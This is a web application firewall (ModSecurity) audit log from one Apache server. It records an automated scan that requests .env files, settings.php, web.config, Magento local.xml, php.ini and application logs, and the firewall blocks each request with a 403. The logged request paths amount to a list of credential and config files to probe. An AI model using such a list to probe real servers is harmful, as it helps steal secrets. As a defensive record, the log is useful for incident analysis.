[29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhMQAAAEc 103.236.140.4 47912 103.236.140.4 8181
--bd1b9473-B--
GET /old/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--bd1b9473-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bd1b9473-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873391050601 688 (- - -)
Stopwatch2: 1745873391050601 688; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bd1b9473-Z--
--f0ad395d-A--
[29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhNgAAAFE 103.236.140.4 47924 103.236.140.4 8181
--f0ad395d-B--
GET /laravel/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--f0ad395d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0ad395d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873391849184 751 (- - -)
Stopwatch2: 1745873391849184 751; combined=327, p1=292, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0ad395d-Z--
--3c3dff24-A--
[29/Apr/2025:03:49:52 +0700] aA_p8AW3ctMdWeqW3LOhNwAAAFA 103.236.140.4 47926 103.236.140.4 8181
--3c3dff24-B--
GET /app/config/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--3c3dff24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3c3dff24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873392045505 683 (- - -)
Stopwatch2: 1745873392045505 683; combined=280, p1=252, p2=0, p3=0, p4=0, p5=27, sr=78, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3c3dff24-Z--
--f764235b-A--
[29/Apr/2025:03:49:53 +0700] aA_p8QW3ctMdWeqW3LOhOQAAAFQ 103.236.140.4 47932 103.236.140.4 8181
--f764235b-B--
GET /.gitignore HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--f764235b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f764235b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873393233703 813 (- - -)
Stopwatch2: 1745873393233703 813; combined=341, p1=293, p2=0, p3=0, p4=0, p5=48, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f764235b-Z--
--405fd031-A--
[29/Apr/2025:03:49:55 +0700] aA_p8wW3ctMdWeqW3LOhPwAAAEM 103.236.140.4 47948 103.236.140.4 8181
--405fd031-B--
GET /sites/default/settings.php HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--405fd031-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--405fd031-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873395299145 716 (- - -)
Stopwatch2: 1745873395299145 716; combined=316, p1=285, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--405fd031-Z--
--4568f921-A--
[29/Apr/2025:03:49:56 +0700] aA_p9AW3ctMdWeqW3LOhRQAAAE0 103.236.140.4 47962 103.236.140.4 8181
--4568f921-B--
GET /php.ini HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--4568f921-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4568f921-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873396314328 1837 (- - -)
Stopwatch2: 1745873396314328 1837; combined=685, p1=356, p2=295, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4568f921-Z--
--1338b36d-A--
[29/Apr/2025:03:49:58 +0700] aA_p9gW3ctMdWeqW3LOhUAAAAEc 103.236.140.4 47992 103.236.140.4 8181
--1338b36d-B--
GET /public/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--1338b36d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1338b36d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873398620697 661 (- - -)
Stopwatch2: 1745873398620697 661; combined=271, p1=244, p2=0, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1338b36d-Z--
--487c3a50-A--
[29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVAAAAEw 103.236.140.4 48004 103.236.140.4 8181
--487c3a50-B--
GET /composer.json HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--487c3a50-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--487c3a50-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/composer.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873400337503 832 (- - -)
Stopwatch2: 1745873400337503 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=136, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--487c3a50-Z--
--d7ccbb56-A--
[29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVQAAAE0 103.236.140.4 48006 103.236.140.4 8181
--d7ccbb56-B--
GET /api/v1/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--d7ccbb56-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d7ccbb56-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873400533705 670 (- - -)
Stopwatch2: 1745873400533705 670; combined=274, p1=243, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d7ccbb56-Z--
--a9d64f50-A--
[29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWQAAAFA 103.236.140.4 48018 103.236.140.4 8181
--a9d64f50-B--
GET /.env.example HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--a9d64f50-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a9d64f50-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873401327496 635 (- - -)
Stopwatch2: 1745873401327496 635; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a9d64f50-Z--
--84ba7801-A--
[29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWgAAAFI 103.236.140.4 48020 103.236.140.4 8181
--84ba7801-B--
GET /storage/logs/laravel.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--84ba7801-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--84ba7801-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873401523911 1833 (- - -)
Stopwatch2: 1745873401523911 1833; combined=766, p1=374, p2=365, p3=0, p4=0, p5=26, sr=108, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--84ba7801-Z--
--51171775-A--
[29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIAAAAIM 103.236.140.4 48038 103.236.140.4 8181
--51171775-B--
GET /.env.local HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--51171775-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--51171775-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873403786527 812 (- - -)
Stopwatch2: 1745873403786527 812; combined=314, p1=275, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--51171775-Z--
--94b2c370-A--
[29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIgAAAIA 103.236.140.4 48044 103.236.140.4 8181
--94b2c370-B--
GET /.env.dev HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--94b2c370-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--94b2c370-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873403982533 740 (- - -)
Stopwatch2: 1745873403982533 740; combined=320, p1=286, p2=0, p3=0, p4=0, p5=33, sr=119, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--94b2c370-Z--
--d7ccbb56-A--
[29/Apr/2025:03:50:04 +0700] aA_p_MDCAfZpkPvVAPOdIwAAAII 103.236.140.4 48046 103.236.140.4 8181
--d7ccbb56-B--
GET /.env.test HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--d7ccbb56-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d7ccbb56-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873404180942 752 (- - -)
Stopwatch2: 1745873404180942 752; combined=309, p1=274, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d7ccbb56-Z--
--be08ba13-A--
[29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXQAAAFY 103.236.140.4 48052 103.236.140.4 8181
--be08ba13-B--
GET /var/logs/dev.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--be08ba13-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--be08ba13-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873405380761 2854 (- - -)
Stopwatch2: 1745873405380761 2854; combined=973, p1=443, p2=499, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--be08ba13-Z--
--62f57559-A--
[29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXgAAAFU 103.236.140.4 48054 103.236.140.4 8181
--62f57559-B--
GET /var/logs/prod.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--62f57559-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--62f57559-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873405580437 2251 (- - -)
Stopwatch2: 1745873405580437 2251; combined=850, p1=434, p2=382, p3=0, p4=0, p5=34, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--62f57559-Z--
--dfb65528-A--
[29/Apr/2025:03:50:06 +0700] aA_p_gW3ctMdWeqW3LOhYwAAAEM 103.236.140.4 48066 103.236.140.4 8181
--dfb65528-B--
GET /web.config HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--dfb65528-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dfb65528-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873406397316 673 (- - -)
Stopwatch2: 1745873406397316 673; combined=266, p1=239, p2=0, p3=0, p4=0, p5=26, sr=70, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dfb65528-Z--
--58d0c92a-A--
[29/Apr/2025:03:50:08 +0700] aA_qAAW3ctMdWeqW3LOhaAAAAEk 103.236.140.4 48084 103.236.140.4 8181
--58d0c92a-B--
GET /app/etc/local.xml HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--58d0c92a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--58d0c92a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873408968388 730 (- - -)
Stopwatch2: 1745873408968388 730; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--58d0c92a-Z--
--7fba204e-A--
[29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhawAAAE0 103.236.140.4 48092 103.236.140.4 8181
--7fba204e-B--
GET /var/log/system.log HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--7fba204e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7fba204e-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873409365573 1833 (- - -)
Stopwatch2: 1745873409365573 1833; combined=690, p1=346, p2=318, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0
